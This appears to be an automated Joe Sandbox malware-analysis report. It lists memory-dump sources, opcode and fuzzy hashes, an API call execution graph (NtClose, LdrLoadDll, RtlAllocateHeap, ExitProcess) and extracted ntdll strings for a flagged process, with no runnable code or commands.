                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 398 7ffd34842993-7ffd3484299a 399 7ffd348429a1-7ffd348429aa 398->399 400 7ffd348429c3-7ffd348429d2 399->400 401 7ffd348429ac-7ffd348429b9 399->401 401->400 403 7ffd348429bb-7ffd348429c1 401->403 403->400
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2386593948.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffd34840000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6f134513ad01e95059a448aef639552198a838281ea1ba7b42b65c6447633e51
                                                      • Instruction ID: 73b6a2d66d8bc2bb938317b13867548c1a4ec6980575256732047e5659acc299
                                                      • Opcode Fuzzy Hash: 6f134513ad01e95059a448aef639552198a838281ea1ba7b42b65c6447633e51
                                                      • Instruction Fuzzy Hash: 59E0E522F0DA250BE37662A834665F8BB80EF9977571801BEDA0DC7253DC196C124185
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2385718361.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: {
                                                      • API String ID: 0-366298937
                                                      • Opcode ID: af5dd7a5d1d2f3f458f3113145d0e4d2feaac871118abfc241f1f90f2499a896
                                                      • Instruction ID: 0c63cc6d52444af7dd19c04a367055759cd1fdebabc38bc71362fa5fe8b7bf54
                                                      • Opcode Fuzzy Hash: af5dd7a5d1d2f3f458f3113145d0e4d2feaac871118abfc241f1f90f2499a896
                                                      • Instruction Fuzzy Hash: 32323B76B08A4A9FDB51EB6CD8A15FD7FE0EF92325B444177C148CB193CA28A846C7D0
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2385718361.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4d61b5f7a793f210729b4f2c0cf9157e009f2a8fa5ab11270223734ab6e1510b
                                                      • Instruction ID: 6c31d88859316be3577931ed62383f0fe9bfaaa63caa6113808aa60c99d1f801
                                                      • Opcode Fuzzy Hash: 4d61b5f7a793f210729b4f2c0cf9157e009f2a8fa5ab11270223734ab6e1510b
                                                      • Instruction Fuzzy Hash: 4D221571A0CA498FDB65DB5CC8A19B97BE1FF5A310F1441BAD049C72A6DA28FC42C7C1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2385718361.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 618fbbb23ee6841e0306c29d340ee5d1f2b7ef1319f039aeb79493b939f6a5fb
                                                      • Instruction ID: 5ea549aaa9b8151799dd64ec14740d65b10b10748646527a3754bbac23cdee98
                                                      • Opcode Fuzzy Hash: 618fbbb23ee6841e0306c29d340ee5d1f2b7ef1319f039aeb79493b939f6a5fb
                                                      • Instruction Fuzzy Hash: E3A162A6B0D7D29EE352863C5CF60E93FA4EF5322474941B7C694CF093DE5D2807A2A1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2385718361.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c2103d751b0df41826ea868a8e5c2bcc4169c98e07fe156fb592cae87ed9f56
                                                      • Instruction ID: 5285ba7baa47d3f61cd64c843ae0464611a7b9dfdbb8753491b458832181745f
                                                      • Opcode Fuzzy Hash: 9c2103d751b0df41826ea868a8e5c2bcc4169c98e07fe156fb592cae87ed9f56
                                                      • Instruction Fuzzy Hash: 44A11571A08A898FDB81DF1CD8A1AE97FF1FF56314F4481B6D049C7292CA38A846C7C0
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2385718361.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fa7cd5038709ae5a0495e9038ddd7ded9ee71a5ee1ff0266cc8fbfb3d3cc37d3
                                                      • Instruction ID: d4bf1d728c56c7ea3a27e9a55da19c903b020227d9b33746bca322ef9e11dd5b
                                                      • Opcode Fuzzy Hash: fa7cd5038709ae5a0495e9038ddd7ded9ee71a5ee1ff0266cc8fbfb3d3cc37d3
                                                      • Instruction Fuzzy Hash: 0F51A6D7B0D6825FE29243285CB60F53FD0DF532B175945B3C289CA493AD4D280BA6D1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2385718361.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cb0d0c8a4ee52c72fbaba5510c293dbd2b1941cfe7d9f9ea5624b22c20e75f9c
                                                      • Instruction ID: f05c551f46780cbd0a8d1733a7f2edb48a5d91494a226f7054724c59647fb0ee
                                                      • Opcode Fuzzy Hash: cb0d0c8a4ee52c72fbaba5510c293dbd2b1941cfe7d9f9ea5624b22c20e75f9c
                                                      • Instruction Fuzzy Hash: 4A71D06244E3C24FD7138BB49D75591BFB0AE1321470F49DBC4C1CF4A3E2586A5AE762
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2385718361.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4881cc6857b96160be88c32e13f0aa56cd89bf94ed379bd5f049e971ac1a4df1
                                                      • Instruction ID: 6d13ca2b117dcc130ebf2b1514aa4dd48deff23673c639c75c35e21cedc631e4
                                                      • Opcode Fuzzy Hash: 4881cc6857b96160be88c32e13f0aa56cd89bf94ed379bd5f049e971ac1a4df1
                                                      • Instruction Fuzzy Hash: 0451625A74E7C29FD713563D5CB10E63FA4EF9326574940F7C2C8CA093DA4C681BA2A2
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2385718361.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e5d8bb1a95d9a2e97dc79602aa0364e9f60449166778cecb17b9d4d3b2327eca
                                                      • Instruction ID: d5a9fe86491b74e1e9bfb0bfab970fa2bb9c4b3d3a32970105965927c497156c
                                                      • Opcode Fuzzy Hash: e5d8bb1a95d9a2e97dc79602aa0364e9f60449166778cecb17b9d4d3b2327eca
                                                      • Instruction Fuzzy Hash: 48419097F0D6D35EE73256295CB60F93F94EF9322574E40B3CA94CA0939D4C284752A1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2385718361.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ffd34770000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f194cb0079f978cf0a507acacf1b33ce7a42ee9bfb96bf5e0ccff4ff8db02cb7
                                                      • Instruction ID: bdc1e77705775dda0b4e267f02bab87a64e5a42d8aaa8a7ff98237e412817ba3
                                                      • Opcode Fuzzy Hash: f194cb0079f978cf0a507acacf1b33ce7a42ee9bfb96bf5e0ccff4ff8db02cb7
                                                      • Instruction Fuzzy Hash: DB41A1D7B0D7D25FE39293681CB60E53FA0DF532A5B4E40B7C784C64D3994D280AA7A1

                                                      Execution Graph

                                                      Execution Coverage:1.4%
                                                      Dynamic/Decrypted Code Coverage:4.7%
                                                      Signature Coverage:8%
                                                      Total number of Nodes:150
                                                      Total number of Limit Nodes:12
                                                      execution_graph 82793 424663 82794 42467f 82793->82794 82795 4246a7 82794->82795 82796 4246bb 82794->82796 82797 42c283 NtClose 82795->82797 82803 42c283 82796->82803 82799 4246b0 82797->82799 82800 4246c4 82806 42e473 RtlAllocateHeap 82800->82806 82802 4246cf 82804 42c29d 82803->82804 82805 42c2ae NtClose 82804->82805 82805->82800 82806->82802 82807 42b863 82808 42b87d 82807->82808 82811 3282df0 LdrInitializeThunk 82808->82811 82809 42b8a5 82811->82809 82812 428883 82813 428894 82812->82813 82814 42891e 82813->82814 82817 424093 82813->82817 82816 428900 82819 4240b6 82817->82819 82818 424111 82818->82816 82819->82818 82820 424223 82819->82820 82821 424238 82819->82821 82822 42c283 NtClose 82820->82822 82823 42c283 NtClose 82821->82823 82824 42422c 82822->82824 82826 424241 82823->82826 82824->82816 82825 424278 82825->82816 82826->82825 82829 42e353 82826->82829 82832 42c5f3 82829->82832 82831 42426c 82831->82816 82833 42c610 82832->82833 82834 42c621 RtlFreeHeap 82833->82834 82834->82831 82960 42f513 82961 42f523 82960->82961 82962 42f529 82960->82962 82963 42e433 RtlAllocateHeap 82962->82963 82964 42f54f 82963->82964 82965 4249f3 82966 424a0c 82965->82966 82967 424a9c 82966->82967 82968 424a57 82966->82968 82971 424a97 82966->82971 82969 42e353 RtlFreeHeap 82968->82969 82970 424a67 82969->82970 82972 42e353 RtlFreeHeap 82971->82972 82972->82967 82835 41e143 82836 41e169 82835->82836 82840 41e25d 82836->82840 82841 42f643 82836->82841 82838 41e1fb 82838->82840 82847 42b8b3 82838->82847 82842 42f5b3 82841->82842 82843 42f610 82842->82843 82851 42e433 82842->82851 82843->82838 82845 42f5ed 82846 42e353 RtlFreeHeap 82845->82846 82846->82843 82848 42b8d0 82847->82848 82857 3282c0a 82848->82857 82849 42b8fc 82849->82840 82854 42c5a3 82851->82854 82853 42e44e 82853->82845 82855 42c5bd 82854->82855 82856 42c5ce RtlAllocateHeap 82855->82856 82856->82853 82858 3282c1f LdrInitializeThunk 82857->82858 82859 3282c11 82857->82859 82858->82849 82859->82849 82860 413763 82863 42c513 82860->82863 82864 42c52d 82863->82864 82867 3282c70 LdrInitializeThunk 82864->82867 82865 413785 82867->82865 82868 41af63 82869 41afa7 82868->82869 82870 42c283 NtClose 82869->82870 82871 41afc8 82869->82871 82870->82871 82872 413cc3 82873 413cdd 82872->82873 82878 417443 82873->82878 82875 413cf8 82876 413d3d 82875->82876 82877 413d2c PostThreadMessageW 82875->82877 82877->82876 82880 417467 82878->82880 82879 41746e 82879->82875 82880->82879 82881 4174a3 LdrLoadDll 82880->82881 82882 4174ba 82880->82882 82881->82882 82882->82875 82883 3282b60 LdrInitializeThunk 82973 4189f8 82974 42c283 NtClose 82973->82974 82975 418a02 82974->82975 82884 401a8d 82885 401aa2 82884->82885 82888 42f9e3 82885->82888 82886 401b21 82886->82886 82891 42df03 82888->82891 82892 42df29 82891->82892 82903 407113 82892->82903 82894 42df3f 82902 42df9b 82894->82902 82906 41ad73 82894->82906 82896 42df5e 82897 42df73 82896->82897 82921 42c643 82896->82921 82917 427f33 82897->82917 82900 42df8d 82901 42c643 ExitProcess 82900->82901 82901->82902 82902->82886 82924 416103 82903->82924 82905 407120 82905->82894 82907 41ad9f 82906->82907 82935 41ac63 82907->82935 82910 41adcc 82911 41add7 82910->82911 82914 42c283 NtClose 82910->82914 82911->82896 82912 41ae00 82912->82896 82913 41ade4 82913->82912 82915 42c283 NtClose 82913->82915 82914->82911 82916 41adf6 82915->82916 82916->82896 82918 427f45 82917->82918 82919 427ebd 82918->82919 82946 4182b3 82918->82946 82919->82900 82922 42c65d 82921->82922 82923 42c66e ExitProcess 82922->82923 82923->82897 82925 416120 82924->82925 82927 416139 82925->82927 82928 42ccf3 82925->82928 82927->82905 82930 42cd0d 82928->82930 82929 42cd3c 82929->82927 82930->82929 82931 42b8b3 LdrInitializeThunk 82930->82931 82932 42cd9c 82931->82932 82933 42e353 RtlFreeHeap 82932->82933 82934 42cdb5 82933->82934 82934->82927 82936 41ac7d 82935->82936 82940 41ad59 82935->82940 82941 42b953 82936->82941 82939 42c283 NtClose 82939->82940 82940->82910 82940->82913 82942 42b970 82941->82942 82945 32835c0 LdrInitializeThunk 82942->82945 82943 41ad4d 82943->82939 82945->82943 82947 4182d2 82946->82947 82953 4187db 82947->82953 82954 413943 82947->82954 82949 41840a 82950 42e353 RtlFreeHeap 82949->82950 82949->82953 82951 418422 82950->82951 82952 42c643 ExitProcess 82951->82952 82951->82953 82952->82953 82953->82919 82955 413960 82954->82955 82958 4139c6 82955->82958 82959 41b083 RtlFreeHeap LdrInitializeThunk 82955->82959 82957 4139bc 82957->82949 82958->82949 82959->82957

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 194 417443-41746c call 42f053 197 417472-417480 call 42f653 194->197 198 41746e-417471 194->198 201 417490-4174a1 call 42d9d3 197->201 202 417482-41748d call 42f8f3 197->202 207 4174a3-4174b7 LdrLoadDll 201->207 208 4174ba-4174bd 201->208 202->201 207->208
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004174B5
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_appidtel.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 0b8fb32eae88c5c9228a46ec6bc86057337fe66ab97db823035b395548dd24e0
                                                      • Instruction ID: 30e24611eab1207cbed8ef651470569edce85fe21e44901280d2eb13d6ab1a47
                                                      • Opcode Fuzzy Hash: 0b8fb32eae88c5c9228a46ec6bc86057337fe66ab97db823035b395548dd24e0
                                                      • Instruction Fuzzy Hash: DC0125B5E0020DABDF10DBE5DC42FDEB778AB54308F4081A6E90897241F675EB588795

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 219 42c283-42c2bc call 404593 call 42d4e3 NtClose
                                                      APIs
                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C2B7
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_appidtel.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 8cf1a166c8af39e65460b9769a816148362c6ea6c98474b196eba40b39fa274d
                                                      • Instruction ID: 11566bb8479ae5f212d05fc3131853bac7d64068d1aaf57e7f41c7f3e351c395
                                                      • Opcode Fuzzy Hash: 8cf1a166c8af39e65460b9769a816148362c6ea6c98474b196eba40b39fa274d
                                                      • Instruction Fuzzy Hash: 0CE04F312402147BD620AA5ADC41FDB775CDBC5715F014029FB1867181C6B0BA0187A4
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 49a79f131427b41783d9c584a72979b7f04247dc162f4840d7c6f9187ce0d633
                                                      • Instruction ID: 088818649757f52e170e907c998223339f55a4547a29c8ac1c0b21a1521e21d5
                                                      • Opcode Fuzzy Hash: 49a79f131427b41783d9c584a72979b7f04247dc162f4840d7c6f9187ce0d633
                                                      • Instruction Fuzzy Hash: 5690023161550802E500B1584514706100587D1201F69C412A1428568D87958A9165A6

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 233 3282b60-3282b6c LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: dcf8ad9678319c61f2845c03a77f704ebcbc7fe0c1c0d07b452b15abe71eadf8
                                                      • Instruction ID: 37625bfc36cb7d7fa400ef20378416ea14f1c156c707beac68b4fa8a30b9280e
                                                      • Opcode Fuzzy Hash: dcf8ad9678319c61f2845c03a77f704ebcbc7fe0c1c0d07b452b15abe71eadf8
                                                      • Instruction Fuzzy Hash: CC900261212404035505B1584414616400A87E1201B59C022E2018590DC62589D16129

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 235 3282df0-3282dfc LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: cb5c9f75f62a71d5cc32bc0e6d5eb5f999c53d49ec6207a11b925a0b3141f9fe
                                                      • Instruction ID: 61b4cfaa0755462a8ed512451e34a8c1d3326d845b8c6790412b70209d9dfa70
                                                      • Opcode Fuzzy Hash: cb5c9f75f62a71d5cc32bc0e6d5eb5f999c53d49ec6207a11b925a0b3141f9fe
                                                      • Instruction Fuzzy Hash: 1790023121140813E511B1584504707000987D1241F99C413A1428558D97568A92A125

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 234 3282c70-3282c7c LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 93bfbdab12da00444af2b38c14e3b8bdc0467d63bbac17e36916c834f92f3519
                                                      • Instruction ID: a7708f25b6334a6bc9e894df692e60499264a186ea4853e39bde44b31bc429ee
                                                      • Opcode Fuzzy Hash: 93bfbdab12da00444af2b38c14e3b8bdc0467d63bbac17e36916c834f92f3519
                                                      • Instruction Fuzzy Hash: 2F90023121148C02E510B158840474A000587D1301F5DC412A5428658D879589D17125

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_appidtel.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -400GIK8$-400GIK8$GIK8$Z
                                                      • API String ID: 0-653522745
                                                      • Opcode ID: d1b3d5030dd90f3f0e3965d10b2d9f829059a266d2ebbedf0848b82cd9cbd963
                                                      • Instruction ID: 18f466229cb4a4d40724333c468d3e85695b0ca7460f8421b3a9ee1ccd6f113a
                                                      • Opcode Fuzzy Hash: d1b3d5030dd90f3f0e3965d10b2d9f829059a266d2ebbedf0848b82cd9cbd963
                                                      • Instruction Fuzzy Hash: 55112972E0021C7ADB11AA95AC91DEFBB7CDF81758F45805EFA047B201E66C4F024BE9

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 18 413cc3-413cd5 19 413cdd-413d2a call 42ee03 call 417443 call 404503 call 424b13 18->19 20 413cd8 call 42e3f3 18->20 29 413d4a-413d50 19->29 30 413d2c-413d3b PostThreadMessageW 19->30 20->19 30->29 31 413d3d-413d47 30->31 31->29
                                                      APIs
                                                      • PostThreadMessageW.USER32(-400GIK8,00000111,00000000,00000000), ref: 00413D37
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_appidtel.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: -400GIK8$-400GIK8$GIK8
                                                      • API String ID: 1836367815-3772982883
                                                      • Opcode ID: 13e4d9db54c27a5f283a6f8ffb3fc3525c9fd619f236033360d3a8ffb492e8d3
                                                      • Instruction ID: f84fcc156499e13383d1cb696e1a1955ab77c8614ea78e61f7cba90b99f8a237
                                                      • Opcode Fuzzy Hash: 13e4d9db54c27a5f283a6f8ffb3fc3525c9fd619f236033360d3a8ffb492e8d3
                                                      • Instruction Fuzzy Hash: 1701F9B1D0021C7AEB11AAE6EC81DEF7B7CDF41698F408059FA04B7141D6784F064BB5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 214 42c5f3-42c637 call 404593 call 42d4e3 RtlFreeHeap
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,C4BDB403,00000007,00000000,00000004,00000000,00416CC3,000000F4), ref: 0042C632
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_appidtel.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 033d879f94878a557677a99a55a2cf20a1403c90a3b3a8ce5a7050a9b5b814ca
                                                      • Instruction ID: b3d542fb0abdf0ca9adcaaa2b3f2ac80a1ddfd6d2ce0bfe7f1cc65ad1eeb1fb2
                                                      • Opcode Fuzzy Hash: 033d879f94878a557677a99a55a2cf20a1403c90a3b3a8ce5a7050a9b5b814ca
                                                      • Instruction Fuzzy Hash: DEE092B66102047BD610EE59EC51FDB33ACEFC8714F004019FA09A7281C670BE11C7B8

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 209 42c5a3-42c5e4 call 404593 call 42d4e3 RtlAllocateHeap
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,0041E1FB,?,?,00000000,?,0041E1FB,?,?,?), ref: 0042C5DF
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_appidtel.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 55ada2e7e829d7b8840c88590f4bbb2bfba03f8fb2ec412be0a57aa2b97c97a2
                                                      • Instruction ID: 5a9596ab0276486e54050629405422715ff3127011e1c06a9e5c6990c5be9f1a
                                                      • Opcode Fuzzy Hash: 55ada2e7e829d7b8840c88590f4bbb2bfba03f8fb2ec412be0a57aa2b97c97a2
                                                      • Instruction Fuzzy Hash: B2E06D76604204BBD610EE59EC41E9B33ACEFC8714F004019FA08A7281D670BA10CBB4

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 224 42c643-42c67c call 404593 call 42d4e3 ExitProcess
                                                      APIs
                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,AECECAC2,?,?,AECECAC2), ref: 0042C677
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_appidtel.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: e031b6b47ccb0ae130ee141ce0d92125462137116f00376eb6097cd9ca51f0f6
                                                      • Instruction ID: f635195abac331b63215388daf76ce6feb201a5198ae88bf0baa32d9a1841a5e
                                                      • Opcode Fuzzy Hash: e031b6b47ccb0ae130ee141ce0d92125462137116f00376eb6097cd9ca51f0f6
                                                      • Instruction Fuzzy Hash: 9AE04F352002147BD620AB5ADC41FDB7B5CDBC9715F004419FA08A7181C670790186E4

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 229 3282c0a-3282c0f 230 3282c1f-3282c26 LdrInitializeThunk 229->230 231 3282c11-3282c18 229->231
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3693145098950395bef1c96dde3ecc5a9701840729794489f4fd09f291913717
                                                      • Instruction ID: eba85f0de1d0cbb04a7561d98cc0462bfccf28204b3ebaff4233168ace443f5e
                                                      • Opcode Fuzzy Hash: 3693145098950395bef1c96dde3ecc5a9701840729794489f4fd09f291913717
                                                      • Instruction Fuzzy Hash: 38B09B719125D5C5EE11F7604608717790467D1701F1EC462D3034645E4739C1D1E175
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2160512332
                                                      • Opcode ID: a53db81769c941942b148b3bb26ac1302b8146072b48e363494585dc3213fcff
                                                      • Instruction ID: a5b76a70d6179b91b226f7ba2034478d132921d6b4f7209f7c51140ae859e43d
                                                      • Opcode Fuzzy Hash: a53db81769c941942b148b3bb26ac1302b8146072b48e363494585dc3213fcff
                                                      • Instruction Fuzzy Hash: AA924F75634382EFDB21DE14C880B6AB7E8BB84754F144E1DFA94D7250DBB4E884CB92
                                                      Strings
                                                      • Critical section debug info address, xrefs: 032B541F, 032B552E
                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 032B540A, 032B5496, 032B5519
                                                      • Critical section address., xrefs: 032B5502
                                                      • Address of the debug info found in the active list., xrefs: 032B54AE, 032B54FA
                                                      • corrupted critical section, xrefs: 032B54C2
                                                      • double initialized or corrupted critical section, xrefs: 032B5508
                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 032B5543
                                                      • undeleted critical section in freed memory, xrefs: 032B542B
                                                      • Thread identifier, xrefs: 032B553A
                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 032B54CE
                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 032B54E2
                                                      • Invalid debug info address of this critical section, xrefs: 032B54B6
                                                      • 8, xrefs: 032B52E3
                                                      • Critical section address, xrefs: 032B5425, 032B54BC, 032B5534
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, Offset: 03210000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_3210000_appidtel.jbxd
                                                      Similarity
                                                      • API ID:
